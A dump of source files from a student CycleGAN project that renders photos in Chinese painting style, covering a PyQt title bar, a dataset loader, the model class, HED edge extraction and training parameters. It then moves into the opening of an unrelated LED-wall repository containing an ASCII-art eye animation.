"repo_name": "AvatarGanymede/ChinesePaintingStyle", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n# Author: jyroy\nimport sys\n\n\nfrom PyQt5.QtCore import Qt, pyqtSignal, QPoint\nfrom PyQt5.QtGui import QFont\nfrom PyQt5.QtWidgets import QHBoxLayout, QLabel, QSpacerItem, QSizePolicy\n\nfrom PyQt5.QtWidgets import QWidget, QPushButton\n\n# 样式\nStyleSheet = \"\"\"\n/*标题栏*/\nTitleBar {\n background-color: red;\n}\n/*最小化最大化关闭按钮通用默认背景*/\n#buttonMinimum,#buttonMaximum,#buttonClose {\n border: none;\n background-color: red;\n}\n/*悬停*/\n#buttonMinimum:hover,#buttonMaximum:hover {\n background-color: red;\n color: white;\n}\n#buttonClose:hover {\n color: white;\n}\n/*鼠标按下不放*/\n#buttonMinimum:pressed,#buttonMaximum:pressed {\n background-color: Firebrick;\n}\n#buttonClose:pressed {\n color: white;\n background-color: Firebrick;\n}\n\"\"\"\n\n\nclass TitleBar(QWidget):\n # 窗口最小化信号\n windowMinimumed = pyqtSignal()\n # # 窗口最大化信号\n # windowMaximumed = pyqtSignal()\n # # 窗口还原信号\n # windowNormaled = pyqtSignal()\n # 窗口关闭信号\n windowClosed = pyqtSignal()\n # 窗口移动\n windowMoved = pyqtSignal(QPoint)\n\n def __init__(self, *args, **kwargs):\n super(TitleBar, self).__init__(*args, **kwargs)\n # 支持qss设置背景\n self.setAttribute(Qt.WA_StyledBackground, True)\n self.mPos = None\n self.iconSize = 20 # 图标的默认大小\n # 布局\n layout = QHBoxLayout(self, spacing=0)\n layout.setContentsMargins(0, 0, 0, 0)\n # 窗口图标\n self.iconLabel = QLabel(self)\n # self.iconLabel.setScaledContents(True)\n layout.addWidget(self.iconLabel)\n # 窗口标题\n self.titleLabel = QLabel(self)\n self.titleLabel.setMargin(2)\n layout.addWidget(self.titleLabel)\n # 中间伸缩条\n layout.addSpacerItem(QSpacerItem(\n 40, 20, QSizePolicy.Expanding, QSizePolicy.Minimum))\n # 利用Webdings字体来显示图标\n font = self.font() or QFont()\n font.setFamily('Webdings')\n # 最小化按钮\n self.buttonMinimum = QPushButton(\n '0', self, clicked=self.windowMinimumed.emit, font=font, objectName='buttonMinimum')\n layout.addWidget(self.buttonMinimum)\n # # 最大化/还原按钮\n # self.buttonMaximum = QPushButton(\n # '1', self, clicked=self.showMaximized, font=font, objectName='buttonMaximum')\n # layout.addWidget(self.buttonMaximum)\n # 关闭按钮\n self.buttonClose = QPushButton(\n 'r', self, clicked=self.windowClosed.emit, font=font, objectName='buttonClose')\n layout.addWidget(self.buttonClose)\n # 初始高度\n self.setHeight()\n\n # def showMaximized(self):\n # if self.buttonMaximum.text() == '1':\n # # 最大化\n # self.buttonMaximum.setText('2')\n # self.windowMaximumed.emit()\n # else: # 还原\n # self.buttonMaximum.setText('1')\n # self.windowNormaled.emit()\n\n def setHeight(self, height=38):\n \"\"\"设置标题栏高度\"\"\"\n self.setMinimumHeight(height)\n self.setMaximumHeight(height)\n # 设置右边按钮的大小\n self.buttonMinimum.setMinimumSize(height, height)\n self.buttonMinimum.setMaximumSize(height, height)\n # self.buttonMaximum.setMinimumSize(height, height)\n # self.buttonMaximum.setMaximumSize(height, height)\n self.buttonClose.setMinimumSize(height, height)\n self.buttonClose.setMaximumSize(height, height)\n\n def setTitle(self, title):\n \"\"\"设置标题\"\"\"\n\n self.titleLabel.setText(title)\n\n def setIcon(self, icon):\n \"\"\"设置图标\"\"\"\n self.iconLabel.setPixmap(icon.pixmap(self.iconSize, self.iconSize))\n\n def setIconSize(self, size):\n \"\"\"设置图标大小\"\"\"\n self.iconSize = size\n\n def enterEvent(self, event):\n self.setCursor(Qt.ArrowCursor)\n super(TitleBar, self).enterEvent(event)\n\n # def mouseDoubleClickEvent(self, event):\n # super(TitleBar, self).mouseDoubleClickEvent(event)\n # self.showMaximized()\n\n def mousePressEvent(self, event):\n \"\"\"鼠标点击事件\"\"\"\n if event.button() == Qt.LeftButton:\n self.mPos = event.pos()\n event.accept()\n\n def mouseReleaseEvent(self, event):\n '''鼠标弹起事件'''\n self.mPos = None\n event.accept()\n\n def mouseMoveEvent(self, event):\n if event.buttons() == Qt.LeftButton and self.mPos:\n self.windowMoved.emit(self.mapToGlobal(event.pos() - self.mPos))\n event.accept()" }, { "alpha_fraction": 0.6119521856307983, "alphanum_fraction": 0.6156706213951111, "avg_line_length": 37.030303955078125, "blob_id": "bbcc573bdeafe6cb6c8f5147cf811fe51037f15f", "content_id": "bc318bf61045b8f9878b0212351336482628dad4", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3765, "license_type": "permissive", "max_line_length": 118, "num_lines": 99, "path": "/utils/dataset.py", "repo_name": "AvatarGanymede/ChinesePaintingStyle", "src_encoding": "UTF-8", "text": "import os\nfrom PIL import Image\nimport random\nimport torchvision.transforms as transforms\nfrom utils.params import opt\nIMG_EXTENSIONS = [\n '.jpg', '.JPG', '.jpeg', '.JPEG',\n '.png', '.PNG', '.ppm', '.PPM', '.bmp', '.BMP',\n '.tif', '.TIF', '.tiff', '.TIFF',\n]\n\n\ndef get_transform(method=Image.BICUBIC):\n transform_list = []\n # resize\n osize = [opt['load_size'], opt['load_size']]\n transform_list.append(transforms.Resize(osize, method))\n # crop\n transform_list.append(transforms.CenterCrop(opt['crop_size']))\n\n # flip\n # transform_list.append(transforms.RandomHorizontalFlip())\n\n # convert\n transform_list += [transforms.ToTensor()]\n transform_list += [transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5))]\n return transforms.Compose(transform_list)\n\n\ndef is_image_file(filename):\n return any(filename.endswith(extension) for extension in IMG_EXTENSIONS)\n\n\ndef make_dataset(_dir, max_dataset_size=float(\"inf\")):\n images = []\n assert os.path.isdir(_dir), '%s is not a valid directory' % _dir\n\n for root, _, fnames in sorted(os.walk(_dir)):\n for fname in fnames:\n if is_image_file(fname):\n path = os.path.join(root, fname)\n images.append(path)\n return images[:min(max_dataset_size, len(images))]\n\n\nclass Dataset:\n \"\"\"\n This dataset class can load unaligned/unpaired datasets.\n\n It requires two directories to host training images from domain A '/path/to/data/trainA'\n and from domain B '/path/to/data/trainB' respectively.\n You can train the model with the dataset flag '--dataroot /path/to/data'.\n Similarly, you need to prepare two directories:\n '/path/to/data/testA' and '/path/to/data/testB' during test time.\n \"\"\"\n\n def __init__(self, train_or_test, max_dataset_size=float(\"inf\")):\n self.dir_A = os.path.join('.\\\\data', train_or_test + 'A') # create a path '/path/to/data/trainA'\n self.dir_B = os.path.join('.\\\\data', train_or_test + 'B') # create a path '/path/to/data/trainB'\n\n self.A_paths = sorted(make_dataset(self.dir_A, max_dataset_size)) # load images from '/path/to/data/trainA'\n self.B_paths = sorted(make_dataset(self.dir_B, max_dataset_size)) # load images from '/path/to/data/trainB'\n self.A_size = len(self.A_paths) # get the size of dataset A\n self.B_size = len(self.B_paths) # get the size of dataset B\n self.transform_A = get_transform()\n self.transform_B = get_transform()\n\n def __getitem__(self, index):\n \"\"\"Return a data point and its metadata information.\n\n Parameters:\n index (int) -- a random integer for data indexing\n\n Returns a dictionary that contains A, B, A_paths and B_paths\n A (tensor) -- an image in the input domain\n B (tensor) -- its corresponding image in the target domain\n A_paths (str) -- image paths\n B_paths (str) -- image paths\n \"\"\"\n A_path = self.A_paths[index % self.A_size] # make sure index is within then range\n # randomize the index for domain B to avoid fixed pairs.\n index_B = random.randint(0, self.B_size - 1)\n\n B_path = self.B_paths[index_B]\n A_img = Image.open(A_path).convert('RGB')\n B_img = Image.open(B_path).convert('RGB')\n # apply image transformation\n A = self.transform_A(A_img)\n B = self.transform_B(B_img)\n\n return {'A': A, 'B': B, 'A_paths': A_path, 'B_paths': B_path}\n\n def __len__(self):\n \"\"\"Return the total number of images in the dataset.\n\n As we have two datasets with potentially different number of images,\n we take a maximum of\n \"\"\"\n return max(self.A_size, self.B_size)\n" }, { "alpha_fraction": 0.5, "alphanum_fraction": 0.7019230723381042, "avg_line_length": 16.5, "blob_id": "fbb70fc901b0dbefc4eaab188a7166a974ac0468", "content_id": "593fae820aef627e947fea21525ccf7f68035d4b", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 104, "license_type": "permissive", "max_line_length": 23, "num_lines": 6, "path": "/requirements.txt", "repo_name": "AvatarGanymede/ChinesePaintingStyle", "src_encoding": "UTF-8", "text": "dominate~=2.6.0\ntorchvision~=0.9.1\npillow~=8.2.0\nnumpy~=1.19.2\nopencv-python~=4.5.2.54\nmatplotlib~=3.3.4" }, { "alpha_fraction": 0.5745269656181335, "alphanum_fraction": 0.5773587226867676, "avg_line_length": 47.25465774536133, "blob_id": "3a00dc470be59269f9dbcb1e8f5e19dedf482941", "content_id": "2726fd27b74dd9885f25ca06411cd3746b9f8fa9", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 15538, "license_type": "permissive", "max_line_length": 151, "num_lines": 322, "path": "/models/cycle_gan.py", "repo_name": "AvatarGanymede/ChinesePaintingStyle", "src_encoding": "UTF-8", "text": "import torch\nimport itertools\nfrom utils.image_pool import ImagePool\nfrom utils.params import opt\nfrom . import models\nfrom . import gan_loss\nimport os\nfrom collections import OrderedDict\n\n\nclass CycleGANModel:\n\n def __init__(self, isTrain):\n \"\"\"Initialize the CycleGAN class.\n\n Parameters:\n opt (Option class)-- stores all the experiment flags; needs to be a subclass of BaseOptions\n \"\"\"\n self.save_dir = os.path.join(opt['checkpoints_dir'], opt['name']) # save all the checkpoints to save_dir\n self.gpu_ids = opt['gpu_ids']\n self.isTrain = isTrain\n self.device = torch.device('cuda:{}'.format(self.gpu_ids[0])) if self.gpu_ids else torch.device(\n 'cpu') # get device name: CPU or GPU\n self.optimizers = []\n\n # specify the training losses you want to print out. The training/test scripts will call <BaseModel.get_current_losses>\n self.loss_names = ['D_A', 'G_A', 'cycle_A', 'idt_A', 'D_B', 'G_B', 'cycle_B', 'idt_B']\n # specify the images you want to save/display. The training/test scripts will call <BaseModel.get_current_visuals>\n visual_names_A = ['real_A', 'fake_B', 'rec_A']\n visual_names_B = ['real_B', 'fake_A', 'rec_B']\n if self.isTrain and opt['lambda_identity'] > 0.0: # if identity loss is used, we also visualize idt_B=G_A(B) ad idt_A=G_A(B)\n visual_names_A.append('idt_B')\n visual_names_B.append('idt_A')\n\n self.visual_names = visual_names_A + visual_names_B # combine visualizations for A and B\n # specify the models you want to save to the disk. The training/test scripts will call <BaseModel.save_networks> and <BaseModel.load_networks>.\n if self.isTrain:\n self.model_names = ['G_A', 'G_B', 'D_A', 'D_B']\n else: # during test time, only load Gs\n self.model_names = ['G_A', 'G_B']\n\n # define networks (both Generators and discriminators)\n # The naming is different from those used in the paper.\n # Code (vs. paper): G_A (G), G_B (F), D_A (D_Y), D_B (D_X)\n self.netG_A = models.define_G(opt['input_nc'], opt['output_nc'], opt['ngf'],\n not opt['no_dropout'], opt['init_gain'], self.gpu_ids)\n self.netG_B = models.define_G(opt['output_nc'], opt['input_nc'], opt['ngf'],\n not opt['no_dropout'], opt['init_gain'], self.gpu_ids)\n\n if self.isTrain: # define discriminators\n self.netD_A = models.define_D(opt['output_nc'], opt['ndf'],\n opt['n_layers_D'], opt['init_gain'], self.gpu_ids)\n self.netD_B = models.define_D(opt['input_nc'], opt['ndf'],\n opt['n_layers_D'], opt['init_gain'], self.gpu_ids)\n\n if self.isTrain:\n if opt['lambda_identity'] > 0.0: # only works when input and output images have the same number of channels\n assert (opt['input_nc'] == opt['output_nc'])\n self.fake_A_pool = ImagePool(opt['pool_size']) # create image buffer to store previously generated images\n self.fake_B_pool = ImagePool(opt['pool_size']) # create image buffer to store previously generated images\n # define loss functions\n self.criterionGAN = gan_loss.GANLoss().to(self.device) # define GAN loss.\n self.criterionCycle = torch.nn.L1Loss()\n self.criterionIdt = torch.nn.L1Loss()\n # initialize optimizers; schedulers will be automatically created by function <BaseModel.setup>.\n self.optimizer_G = torch.optim.Adam(itertools.chain(self.netG_A.parameters(), self.netG_B.parameters()),\n lr=opt['lr'], betas=(opt['beta1'], 0.999))\n self.optimizer_D = torch.optim.Adam(itertools.chain(self.netD_A.parameters(), self.netD_B.parameters()),\n lr=opt['lr'], betas=(opt['beta1'], 0.999))\n self.optimizers.append(self.optimizer_G)\n self.optimizers.append(self.optimizer_D)\n\n def set_input(self, _input):\n \"\"\"Unpack input data from the dataloader and perform necessary pre-processing steps.\n\n Parameters:\n _input (dict): include the data itself and its metadata information.\n\n The option 'direction' can be used to swap domain A and domain B.\n \"\"\"\n self.real_A = _input['A'].to(self.device)\n self.real_B = _input['B'].to(self.device)\n self.image_paths = _input['A_paths']\n\n def forward(self):\n \"\"\"Run forward pass; called by both functions <optimize_parameters> and <test>.\"\"\"\n self.fake_B = self.netG_A(self.real_A) # G_A(A)\n self.rec_A = self.netG_B(self.fake_B) # G_B(G_A(A))\n self.fake_A = self.netG_B(self.real_B) # G_B(B)\n self.rec_B = self.netG_A(self.fake_A) # G_A(G_B(B))\n\n def backward_D_basic(self, netD, real, fake):\n \"\"\"Calculate GAN loss for the discriminator\n\n Parameters:\n netD (network) -- the discriminator D\n real (tensor array) -- real images\n fake (tensor array) -- images generated by a generator\n\n Return the discriminator loss.\n We also call loss_D.backward() to calculate the gradients.\n \"\"\"\n # Real\n pred_real = netD(real)\n loss_D_real = self.criterionGAN(pred_real, True)\n # Fake\n pred_fake = netD(fake.detach())\n loss_D_fake = self.criterionGAN(pred_fake, False)\n # Combined loss and calculate gradients\n loss_D = (loss_D_real + loss_D_fake) * 0.5\n loss_D.backward()\n return loss_D\n\n def backward_D_A(self):\n \"\"\"Calculate GAN loss for discriminator D_A\"\"\"\n fake_B = self.fake_B_pool.query(self.fake_B)\n self.loss_D_A = self.backward_D_basic(self.netD_A, self.real_B, fake_B)\n\n def backward_D_B(self):\n \"\"\"Calculate GAN loss for discriminator D_B\"\"\"\n fake_A = self.fake_A_pool.query(self.fake_A)\n self.loss_D_B = self.backward_D_basic(self.netD_B, self.real_A, fake_A)\n\n def backward_G(self):\n \"\"\"Calculate the loss for generators G_A and G_B\"\"\"\n lambda_idt = opt['lambda_identity']\n lambda_A = opt['lambda_A']\n lambda_B = opt['lambda_B']\n # Identity loss\n if lambda_idt > 0:\n # G_A should be identity if real_B is fed: ||G_A(B) - B||\n self.idt_A = self.netG_A(self.real_B)\n self.loss_idt_A = self.criterionIdt(self.idt_A, self.real_B) * lambda_B * lambda_idt\n # G_B should be identity if real_A is fed: ||G_B(A) - A||\n self.idt_B = self.netG_B(self.real_A)\n self.loss_idt_B = self.criterionIdt(self.idt_B, self.real_A) * lambda_A * lambda_idt\n else:\n self.loss_idt_A = 0\n self.loss_idt_B = 0\n\n # GAN loss D_A(G_A(A))\n self.loss_G_A = self.criterionGAN(self.netD_A(self.fake_B), True)\n # GAN loss D_B(G_B(B))\n self.loss_G_B = self.criterionGAN(self.netD_B(self.fake_A), True)\n # Forward cycle loss || G_B(G_A(A)) - A||\n self.loss_cycle_A = self.criterionCycle(self.rec_A, self.real_A) * lambda_A\n # Backward cycle loss || G_A(G_B(B)) - B||\n self.loss_cycle_B = self.criterionCycle(self.rec_B, self.real_B) * lambda_B\n # combined loss and calculate gradients\n self.loss_G = self.loss_G_A + self.loss_G_B + self.loss_cycle_A + self.loss_cycle_B + self.loss_idt_A + self.loss_idt_B\n self.loss_G.backward()\n\n def optimize_parameters(self):\n \"\"\"Calculate losses, gradients, and update network weights; called in every training iteration\"\"\"\n # forward\n self.forward() # compute fake images and reconstruction images.\n # G_A and G_B\n self.set_requires_grad([self.netD_A, self.netD_B], False) # Ds require no gradients when optimizing Gs\n self.optimizer_G.zero_grad() # set G_A and G_B's gradients to zero\n self.backward_G() # calculate gradients for G_A and G_B\n self.optimizer_G.step() # update G_A and G_B's weights\n # D_A and D_B\n self.set_requires_grad([self.netD_A, self.netD_B], True)\n self.optimizer_D.zero_grad() # set D_A and D_B's gradients to zero\n self.backward_D_A() # calculate gradients for D_A\n self.backward_D_B() # calculate graidents for D_B\n self.optimizer_D.step() # update D_A and D_B's weights\n\n def optimize_D_parameters(self):\n \"\"\"Calculate losses, gradients, and update D network weights\"\"\"\n # forward\n self.forward() # compute fake images and reconstruction images.\n # D_A and D_B\n self.set_requires_grad([self.netD_A, self.netD_B], True)\n self.optimizer_D.zero_grad() # set D_A and D_B's gradients to zero\n self.backward_D_A() # calculate gradients for D_A\n self.backward_D_B() # calculate graidents for D_B\n self.optimizer_D.step() # update D_A and D_B's weights\n\n def set_requires_grad(self, nets, requires_grad=False):\n \"\"\"Set requies_grad=Fasle for all the networks to avoid unnecessary computations\n Parameters:\n nets (network list) -- a list of networks\n requires_grad (bool) -- whether the networks require gradients or not\n \"\"\"\n if not isinstance(nets, list):\n nets = [nets]\n for net in nets:\n if net is not None:\n for param in net.parameters():\n param.requires_grad = requires_grad\n\n def setup(self):\n \"\"\"Load and print networks; create schedulers\n\n Parameters:\n opt (Option class) -- stores all the experiment flags; needs to be a subclass of BaseOptions\n \"\"\"\n if self.isTrain:\n self.schedulers = [models.get_scheduler(optimizer) for optimizer in self.optimizers]\n if not self.isTrain or opt['continue_train']:\n load_suffix = 'iter_%d' % opt['load_iter'] if opt['load_iter'] > 0 else opt['epoch']\n self.load_networks(load_suffix)\n self.print_networks(opt['verbose'])\n\n def load_networks(self, epoch):\n \"\"\"Load all the networks from the disk.\n\n Parameters:\n epoch (int) -- current epoch; used in the file name '%s_net_%s.pth' % (epoch, name)\n \"\"\"\n for name in self.model_names:\n if isinstance(name, str):\n load_filename = '%s_net_%s.pth' % (epoch, name)\n load_path = os.path.join(self.save_dir, load_filename)\n net = getattr(self, 'net' + name)\n if isinstance(net, torch.nn.DataParallel):\n net = net.module\n print('loading the model from %s' % load_path)\n # if you are using PyTorch newer than 0.4 (e.g., built from\n # GitHub source), you can remove str() on self.device\n state_dict = torch.load(load_path, map_location=str(self.device))\n if hasattr(state_dict, '_metadata'):\n del state_dict._metadata\n\n # patch InstanceNorm checkpoints prior to 0.4\n for key in list(state_dict.keys()): # need to copy keys here because we mutate in loop\n self.__patch_instance_norm_state_dict(state_dict, net, key.split('.'))\n net.load_state_dict(state_dict)\n\n def __patch_instance_norm_state_dict(self, state_dict, module, keys, i=0):\n \"\"\"Fix InstanceNorm checkpoints incompatibility (prior to 0.4)\"\"\"\n key = keys[i]\n if i + 1 == len(keys): # at the end, pointing to a parameter/buffer\n if module.__class__.__name__.startswith('InstanceNorm') and \\\n (key == 'running_mean' or key == 'running_var'):\n if getattr(module, key) is None:\n state_dict.pop('.'.join(keys))\n if module.__class__.__name__.startswith('InstanceNorm') and \\\n (key == 'num_batches_tracked'):\n state_dict.pop('.'.join(keys))\n else:\n self.__patch_instance_norm_state_dict(state_dict, getattr(module, key), keys, i + 1)\n\n def print_networks(self, verbose):\n \"\"\"Print the total number of parameters in the network and (if verbose) network architecture\n\n Parameters:\n verbose (bool) -- if verbose: print the network architecture\n \"\"\"\n print('---------- Networks initialized -------------')\n for name in self.model_names:\n if isinstance(name, str):\n net = getattr(self, 'net' + name)\n num_params = 0\n for param in net.parameters():\n num_params += param.numel()\n if verbose:\n print(net)\n print('[Network %s] Total number of parameters : %.3f M' % (name, num_params / 1e6))\n print('-----------------------------------------------')\n\n def update_learning_rate(self):\n \"\"\"Update learning rates for all the networks; called at the end of every epoch\"\"\"\n old_lr = self.optimizers[0].param_groups[0]['lr']\n for scheduler in self.schedulers:\n scheduler.step()\n\n lr = self.optimizers[0].param_groups[0]['lr']\n print('learning rate %.7f -> %.7f' % (old_lr, lr))\n\n def get_current_losses(self):\n \"\"\"Return traning losses / errors. train.py will print out these errors on console, and save them to a file\"\"\"\n errors_ret = OrderedDict()\n for name in self.loss_names:\n if isinstance(name, str):\n errors_ret[name] = float(getattr(self, 'loss_' + name)) # float(...) works for both scalar tensor and float number\n return errors_ret\n\n def compute_visuals(self):\n \"\"\"Calculate additional output images for visdom and HTML visualization\"\"\"\n pass\n\n def save_networks(self, epoch):\n \"\"\"Save all the networks to the disk.\n\n Parameters:\n epoch (int) -- current epoch; used in the file name '%s_net_%s.pth' % (epoch, name)\n \"\"\"\n for name in self.model_names:\n if isinstance(name, str):\n save_filename = '%s_net_%s.pth' % (epoch, name)\n save_path = os.path.join(self.save_dir, save_filename)\n net = getattr(self, 'net' + name)\n\n if len(self.gpu_ids) > 0 and torch.cuda.is_available():\n torch.save(net.module.cpu().state_dict(), save_path)\n net.cuda(self.gpu_ids[0])\n else:\n torch.save(net.cpu().state_dict(), save_path)\n\n def get_current_visuals(self):\n \"\"\"Return visualization images. train.py will display these images with visdom, and save the images to a HTML\"\"\"\n visual_ret = OrderedDict()\n for name in self.visual_names:\n if isinstance(name, str):\n visual_ret[name] = getattr(self, name)\n return visual_ret\n\n def test(self):\n \"\"\"Forward function used in test time.\n\n This function wraps <forward> function in no_grad() so we don't save intermediate steps for backprop\n It also calls <compute_visuals> to produce additional visualization results\n \"\"\"\n with torch.no_grad():\n self.forward()\n self.compute_visuals()\n\n def get_image_paths(self):\n \"\"\" Return image paths that are used to load current data\"\"\"\n return self.image_paths\n" }, { "alpha_fraction": 0.5824790596961975, "alphanum_fraction": 0.6109039783477783, "avg_line_length": 33.06349182128906, "blob_id": "ae632a632cb23ee5360a7989c67154a6e45dc542", "content_id": "c4d35b959a88b08c11a6d0714bbacabd95d1b5fa", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2186, "license_type": "permissive", "max_line_length": 119, "num_lines": 63, "path": "/edge/hed.py", "repo_name": "AvatarGanymede/ChinesePaintingStyle", "src_encoding": "UTF-8", "text": "import cv2 as cv\nimport os\nimport numpy as np\nimport matplotlib.image as mp\nfrom skimage import img_as_ubyte\nfrom PIL import Image\n\n\nclass CropLayer(object):\n def __init__(self, params, blobs):\n self.xstart = 0\n self.xend = 0\n self.ystart = 0\n self.yend = 0\n\n # Our layer receives two inputs. We need to crop the first input blob\n # to match a shape of the second one (keeping batch size and number of channels)\n def getMemoryShapes(self, inputs):\n inputShape, targetShape = inputs[0], inputs[1]\n batchSize, numChannels = inputShape[0], inputShape[1]\n height, width = targetShape[2], targetShape[3]\n\n self.ystart = (inputShape[2] - targetShape[2]) // 2\n self.xstart = (inputShape[3] - targetShape[3]) // 2\n self.yend = self.ystart + height\n self.xend = self.xstart + width\n\n return [[batchSize, numChannels, height, width]]\n\n def forward(self, inputs):\n return [inputs[0][:,:,self.ystart:self.yend,self.xstart:self.xend]]\n\n\ndef extract_edge(frame):\n # Load the model.\n net = cv.dnn.readNet(cv.samples.findFile('deploy.prototxt'), cv.samples.findFile('hed_pretrained_bsds.caffemodel'))\n inp = cv.dnn.blobFromImage(frame, scalefactor=1.0, size=(frame.shape[1], frame.shape[0]),\n mean=(104.00698793, 116.66876762, 122.67891434),\n swapRB=False, crop=False)\n net.setInput(inp)\n edge = net.forward()\n edge = edge[0, 0]\n edge = cv.resize(edge, (frame.shape[1], frame.shape[0]))\n edge = cv.merge([edge, edge, edge])\n frame = frame/2 + frame/2 * edge\n return frame\n\n\nif __name__ == '__main__':\n # ! [Register]\n cv.dnn_registerLayer('Crop', CropLayer)\n # ! [Register]\n path = \"..\\\\data\\\\org_trainA\\\\\" # 图像读取地址\n savepath = \"..\\\\data\\\\trainA\\\\\" # 图像保存地址\n filelist = os.listdir(path) # 打开对应的文件夹\n\n for item in filelist:\n name = path + item\n img = cv.imread(name)\n rst = extract_edge(img)\n save_name = savepath + item\n print(item+' is processed and saved to '+save_name)\n cv.imwrite(save_name, rst)\n" }, { "alpha_fraction": 0.5723684430122375, "alphanum_fraction": 0.7960526347160339, "avg_line_length": 29.299999237060547, "blob_id": "50e80563d56c322e1e3f0c55e5a209763c25129b", "content_id": "e7a63ee710db9f03958d08bfd1c1fdc943854be1", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 304, "license_type": "permissive", "max_line_length": 71, "num_lines": 10, "path": "/README.md", "repo_name": "AvatarGanymede/ChinesePaintingStyle", "src_encoding": "UTF-8", "text": "# CycleGan-for-Computer-Photography\nA course project for Computer Photography class of Zhejiang University.\n\n#### The Results:\n\n![image-20210617001637880](README.assets/image-20210617001637880.png)\n\n#### The Graphic User Interface:\n\n![image-20210617001721302](README.assets/image-20210617001721302.png)\n\n" }, { "alpha_fraction": 0.508171796798706, "alphanum_fraction": 0.5378183126449585, "avg_line_length": 50.588233947753906, "blob_id": "c5de90d2b7783e61f0be27687bcad44f13c993ba", "content_id": "cdcc4960875989ae08fa8b6b012b5f70a954de77", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2631, "license_type": "permissive", "max_line_length": 314, "num_lines": 51, "path": "/utils/params.py", "repo_name": "AvatarGanymede/ChinesePaintingStyle", "src_encoding": "UTF-8", "text": "opt = dict( load_size=286, # scale images to this size\n crop_size=256, # then crop to this size\n batch_size=1, # input batch size\n num_threads=1, # treads for loading data\n gpu_ids=[0], # id of gpu\n lambda_identity=0.5, # use identity mapping. Setting lambda_identity other than 0 has an effect of scaling the weight of the identity mapping loss. For example, if the weight of the identity loss should be 10 times smaller than the weight of the reconstruction loss, please set lambda_identity = 0.1\n lambda_A=10.0, # weight for cycle loss (A -> B -> A)\n lambda_B=10.0, # weight for cycle loss (B -> A -> B)\n input_nc=3,\n output_nc=3,\n ngf=64, # of gen filters in the last conv layer\n ndf=64, # of discriminator filters in the first conv layer\n no_dropout=False,\n init_gain=0.02, # scaling factor for normal, xavier and orthogonal.\n pool_size=50, # the size of image buffer that stores previously generated images\n lr=0.0002, # initial learning rate for adam\n beta1=0.5, # momentum term of adam\n display_id=-1, # window id of the web display\n no_html=False,\n display_winsize=256, # display window size for both visdom and HTML\n name='Chinese Painting Style',\n display_port=8888, # visdom port of the web display\n display_ncols=4, # if positive, display all images in a single visdom web panel with certain number of images per row.\n display_server=\"http://localhost\", # visdom server of the web display\n display_env='main',\n checkpoints_dir='.\\\\checkpoints',\n n_layers_D=3, # only used if netD==n_layers\n\n epoch_count=1,\n n_epochs=25,\n n_epochs_decay=25,\n\n continue_train=False,\n load_iter=0,\n epoch='latest',\n verbose=False,\n print_freq=100, # frequency of showing training results on console\n display_freq=400,\n update_html_freq=1000, # frequency of saving training results to html\n save_latest_freq=5000,\n save_by_iter=False,\n save_epoch_freq=5,\n\n n_epochs_D=2,\n\n results_dir='./results/',\n phase='test',\n num_test=500,\n aspect_ratio=1.0,\n\n )\n" } ]
13
deepestcyber/rgb-tetris-wall
https://github.com/deepestcyber/rgb-tetris-wall
0a3f5fee5ce3fe947d6a56d1a6feb16e9e9a4da9
8ec63ec8a4b7a0f89d0dd427b5c2e786a03c5a83
075e1cb9ed0e9c6f0eb3e07c721a7e719df9989d
refs/heads/master
2022-11-26T05:51:35.462406
2019-12-12T21:49:27
2019-12-12T21:49:27
120,461,677
4
0
null
2018-02-06T13:33:53
2019-12-12T21:50:02
2022-11-22T02:31:27
Python
[ { "alpha_fraction": 0.6241610646247864, "alphanum_fraction": 0.681208074092865, "avg_line_length": 18.866666793823242, "blob_id": "57935a3db0e96dcdbaa44b0fe60991bed3b3ad2c", "content_id": "1979f237ab38ecbfd367eb174e20d4f4c92fdd78", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 298, "license_type": "no_license", "max_line_length": 50, "num_lines": 15, "path": "/raspi_preproc/workbench/streaming/util/show_single.py", "repo_name": "deepestcyber/rgb-tetris-wall", "src_encoding": "UTF-8", "text": "import numpy as np\nimport matplotlib.pyplot as plt\n\nfrom encoding import UYVY_RAW2RGB_PIL\n\nwith open('test.raw', 'rb') as f:\n data = np.array(list(f.read()), dtype='uint8')\n\nimg = UYVY_RAW2RGB_PIL(data, 720, 576)\nimg.show()\n\n#frame = data[1::2].reshape(720, 576)\n\n#plt.imshow(frame)\n#plt.show()\n" }, { "alpha_fraction": 0.4063529074192047, "alphanum_fraction": 0.44392794370651245, "avg_line_length": 19.407114028930664, "blob_id": "26848b61ca87f255987431ff6956ece8ac982714", "content_id": "8ed5b6b0eb278d74e2ed95f65186b3abd522d733", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5163, "license_type": "no_license", "max_line_length": 71, "num_lines": 253, "path": "/reels/argos.py", "repo_name": "deepestcyber/rgb-tetris-wall", "src_encoding": "UTF-8", "text": "\"\"\"\nArgos reel for LED wall.\n\nJust some harmless eyes, looking around.\n\nTODO: check if colours look decent on wall.\n\nCreated by kratenko.\n\"\"\"\nimport numpy as np\nimport time\nimport random\n\nfrom fluter import Fluter\n\n\niris = \"\"\"\n -\n aaaa -\n aaaaaa -\n aaaooaaa -\n aaooooaa -\n aaooooaa -\n aaaooaaa -\n aaaaaa -\n aaaa -\n -\n -\n\"\"\"\n\nball = \"\"\"\n -\n -\nwwwwwwwwwwwwwwww-\nwwwwwwwwwwwwwwww-\nwwwwwwwwwwwwwwww-\nwwwwwwwwwwwwwwww-\nwwwwwwwwwwwwwwww-\nwwwwwwwwwwwwwwww-\nwwwwwwwwwwwwwwww-\n\n\"\"\"\n\nlid1 = \"\"\"\n................-\n.....vxxxxv.....-\n...vxx xxv...-\n.vxx xxv.-\nvx xv-\nx x-\nvx xv-\n.vx xv.-\n..vxx xxv..-\n....vxxxxxxv....-\n................-\n\"\"\"\n\nlid2 = \"\"\"\n................-\n.....vxxxxv.....-\n...vxxyyyyxxv...-\n.vxx xxxxxx xxv.-\nvx xv-\nx x-\nvx xv-\n.vx xv.-\n..vxx 